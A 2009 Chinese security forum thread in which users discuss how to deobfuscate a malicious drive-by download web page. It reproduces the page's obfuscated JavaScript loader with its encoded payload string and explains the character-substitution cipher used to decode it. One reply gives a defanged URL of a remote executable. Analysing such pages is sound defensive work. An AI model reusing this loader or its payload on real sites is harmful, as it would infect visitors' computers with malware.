请教hxxp://f.98tdw.cn/d3/b1/google.htm解密方法

jerrysun

在看 hxxp://f.98tdw.cn/d3/b1/google.htm 挂马页时遇到了些问题。

这个网页我只能解一半，我将document.write换成alert 然后再运行 为什么不能弹出解密后的内容？
求教各位高手。麻烦说一下解密的过程，不胜感激。
部分解密并调整格式后的源代码如下：
<hTmL><hEaD><Meta Name=Encoder Content=HTMLSHIP>
<META HTTP-EQUIV="imagetoolbar" CONTENT="no"><noscript><iframe></iframe></noscript><sCrIpT lAnGuAgE="jAvAsCrIpT"><!--
iV28=555;
function tA94(jD72)
{
   hI30(";
   for(var eV50=0;
   eV50<16;
   eV50++)
   {
     var re1=new RegExp(rI12.charAt(eV50),["g"]);
     iM88=iM88.replace(re1,"%"+oC65.charAt(eV50));
     var re2=new RegExp(rI12.charAt(eV50+16),["g"]);
     iM88=iM88.replace(re2,"%u"+oC65.charAt(eV50));
   }
   document.write(unescape(iM88));
   ")
}
;tA94(0.4454675,eval(unescape("yP86=7574;
if(document.all)
{
   function _dm()
   {
     return false
   }
   ;function _mdm()
   {
     document.oncontextmenu=_dm;
     setTimeout("_mdm()",800)
   }
   ;_mdm();
}
document.oncontextmenu=new Function("return false");
function _ndm(e)
{
   if(document.layers||window.sidebar)
   {
     if(e.which!=1)return false;
   }
   
}
;if(document.layers)
{
   document.captureEvents(Event.MOUSEDOWN);
   document.onmousedown=_ndm;
}
else
{
   document.onmouseup=_ndm;
}
;nH54=5285;
dF19=9287;
function _dws()
{
   window.status = " ";
   setTimeout("_dws()",100);
}
;_dws();
kV33=8714;
jN89=6146;
function _dds()
{
   if(document.all)
   {
     document.onselectstart=function ()
     {
       return false
     }
     ;setTimeout("_dds()",700)
   }
   
}
;_dds();
iB49=7289;
jE61=2430;
aP67=5288;
mV14=6428;
lI73=7571;
bG38=1572;
rQ44=4431;
;
_licensed_to_="huyufeng";
hI30=function(s)
{
   eval(unescape(s))
   alert(s)
}
;cB83=3701;
")),0.6460614,hI30("rI12="isJORImMlLrxQTnNtXwoHpKWPkSjhVqv";
oC65="0123456789ABCDEF""),0.619414,iM88="J2JBJ2JBJ2JBJ2JBJ2JBJ2JBJ2JBJ2iDiAOCI3R3I2R9I0I4J0RCR1RER7I5R1R7R5ODJ2mAm1M6m1M3m3M2m9M0M4J2OEiDiAM7m9mEm4mFM7JEmFmEm5M2M2mFM2ODm6M5mEm3M4m9mFmEJ8J9MBM2m5M4M5M2mEJ0M4M2M5m5OBMDiDiAm6M5mEm3M4m9mFmEJ0m9mEm9M4J8J9MBm4mFm3M5mDm5mEM4JEM7M2m9M4m5J8J9OBMDiDiAM7m9mEm4mFM7JEmFmEmCmFm1m4J0ODJ0m9mEm9M4OBiDiAm9m6J8m4mFm3M5mDm5mEM4JEm3mFmFmBm9m5JEm9mEm4m5M8RFm6J8J2M7M5m4m9M8m9m1mFMAm9ODJ2J9ODODJDO1J9iDiAMBiDiAM6m1M2J0mBm2mBM3ODJ2mBm2M3M4m7J2OBiDiAM6m1M2J0M3mBM0m1mFM0m1mFODmEm5M7J0R4m1M4m5J8J9OBiDiAM6m1M2J0m5M8M0m9M2m5M3ODmEm5M7J0R4m1M4m5J8J9OBiDiAm5M8M0m9M2m5M3JEM3m5M4I4m9mDm5J8m5M8M0m9M2m5M3JEm7m5M4I4m9mDm5J8J9JBO2O4JAO6O0JAO6O0JAO1O0O0O0J9OBiDiAm4mFm3M5mDm5mEM4JEm3mFmFmBm9m5ODJ2M7M5m4m9M8m9m1mFMAm9ODI9m5M3OBM0m1M4m8ODJFOBm5M8M0m9M2m5M3ODJ2JBm5M8M0m9M2m5M3JEM4mFR7RDI4I3M4M2m9mEm7J8J9OBiDiAm9m6J8mEm1M6m9m7m1M4mFM2JEM5M3m5M2R1m7m5mEM4JEM4mFRCmFM7m5M2R3m1M3m5J8J9JEm9mEm4m5M8RFm6J8J2mDM3m9m5J2J9OEO0J9iDiAMBiDiAm4mFm3M5mDm5mEM4JEM7M2m9M4m5J8J7OCmFm2mAm5m3M4J0m3mCm1M3M3m9m4ODJ2m3mCM3m9m4OAm4O2O7m3m4m2J2JBJ2O6m5JDm1m5O6m4JDO1O1m3m6JDO9O6m2O8JDO4O4O4O5O5O3O5O4O0O0O0O0J2J0m3mFm4m5m2m1M3m5ODJ2m8M4M4M0OAJFJFm4mFM7mEmCmFm1m4JEmDm1m3M2mFmDm5m4m9m1JEm3mFmDJFM0M5m2JFM3m8mFm3mBM7m1M6m5JFm3m1m2M3JFm6mCm1M3m8JFM3M7m6mCm1M3m8JEm3m1m2J3M6m5M2M3m9mFmEODO4JCO0JCO1O9JCO0J2J0M7m9m4M4m8ODJ2O0J2J0m8m5m9m7m8M4ODJ2O0J2J0m1mCm9m7mEODJ2mDm9m4m4mCm5J2OEJ7J9OBiDiAm4mFm3M5mDm5mEM4JEM7M2m9M4m5J8J7OCM0m1M2m1mDJ0mEm1mDm5ODJ2m1mCmCmFM7I3m3M2m9M0M4R1m3m3m5M3M3J2J0M6m1mCM5m5ODJ2M3m1mDm5R4mFmDm1m9mEJ2JFOEJ7J9OBiDiAiDiAm4mFm3M5mDm5mEM4JEM7M2m9M4m5J8J7OCM0m1M2m1mDJ0mEm1mDm5ODJ2mDmFM6m9m5J2J0M6m1mCM5m5ODJ2m9m5JEM3M7m6J2JFOEJ7J9OBiDiAm4mFm3M5mDm5mEM4JEM7M2m9M4m5J8J7OCM0m1M2m1mDJ0mEm1mDm5ODJ2M1M5m1mCm9M4M9J2J0M6m1mCM5m5ODJ2m8m9m7m8J2JFOEJ7J9OBiDiAm4mFm3M5mDm5mEM4JEM7M2m9M4m5J8J7OCM0m1M2m1mDJ0mEm1mDm5ODJ2m2m7m3mFmCmFM2J2J0M6m1mCM5m5ODJ2J3m6m6m6m6m6m6J2JFOEJ7J9OBiDiAm4mFm3M5mDm5mEM4JEM7M2m9M4m5J8J7OCm5mDm2m5m4J0M3M2m3ODJ2m9m5JEM3M7m6J2JFOEJ7J9OBiDiAm4mFm3M5mDm5mEM4JEM7M2m9M4m5J8J7OCJFmFm2mAm5m3M4OEJ7J9OBiDiAMDiDiAm5mCM3m5iDiAMBiDiAm4mFm3M5mDm5mEM4JEM7M2m9M4m5J8J2OCR5RDR2R5R4J0M3M2m3ODm6m6JEM3M7m6J0M7m9m4M4m8ODO0J0m8m5m9m7m8M4ODO0OEJ2J9OBiDiAMDiDiAm4mFm3M5mDm5mEM4JEM7M2m9M4m5mCmEJ8J2OCm9m6M2m1mDm5J0M3M2m3ODm1mCmCJEm8M4mDJ0M7m9m4M4m8ODO1O0O0J0m8m5m9m7m8M4ODO0OEOCICJFm9m6M2m1mDm5OEJ2J9OBMDiDiAiDiAOCJFI3R3I2R9I0I4OEiDiAOCJFR2RFR4I9OEOCJFR8I4RDRCOE");
//--></sCrIpT></hEaD><boDY><noscript><b><font color=red></font></b></noscript></bOdY></hTmL>

希望各位大虾不吝赐教~~~

[ 本帖最后由 jerrysun 于 2009-3-29 12:19 编辑 ]

mouse_0232

关于:hxxp://f.98tdw.cn/d3/b1/google.htm解密的日志(全体输出 -  2):

Level  0>http://f.98tdw.cn/d3/b1/google.htm
Level  1>http://f.98tdw.cn/d3/b1/all.htm

此网址由幸福的耗子解密(本人博客www.mouse0232.com)

用REDOCE 中的解密 document.write清除 就可以了

雨宫优子

见我的博客....3月14日挂马报告...

jerrysun

您博客上的文章和这个不是一回事啊

不过还是谢谢您的回复

mouse_0232

这个网页代码 不要解一半

看见网页代码直接用document.write清除 就可以了

jerrysun

在我的电脑上 选document.write清除 不能弹出ie。在vm里运行正常解密了.........

谢谢您的回复

顺便想请教一下，我将document.write改成alert 不能正常解密。如果手动解密，需要怎么做呢？

zzh161

var re1=new RegExp(rI12.charAt(eV50),["g"]);
iM88=iM88.replace(re1,"%"+oC65.charAt(eV50));
rI12="isJORImMlLrxQTnNtXwoHpKWPkSjhVqv";
oC65="0123456789ABCDEF"
这四行是关键，用正则表达式对iM88进行替换，整个过程是在一个for循环中执行的，替换的方法就是 iM88中对应rl12中的第N个字符替换为“%”加上oC65中的第N个字符

比如，iM88中的所有i都会被替换成0，s被替换成1，以此类推

qigang

写教程麻烦。

will

h**p://d3.741239.com/03/g1.exe

328397663

to kl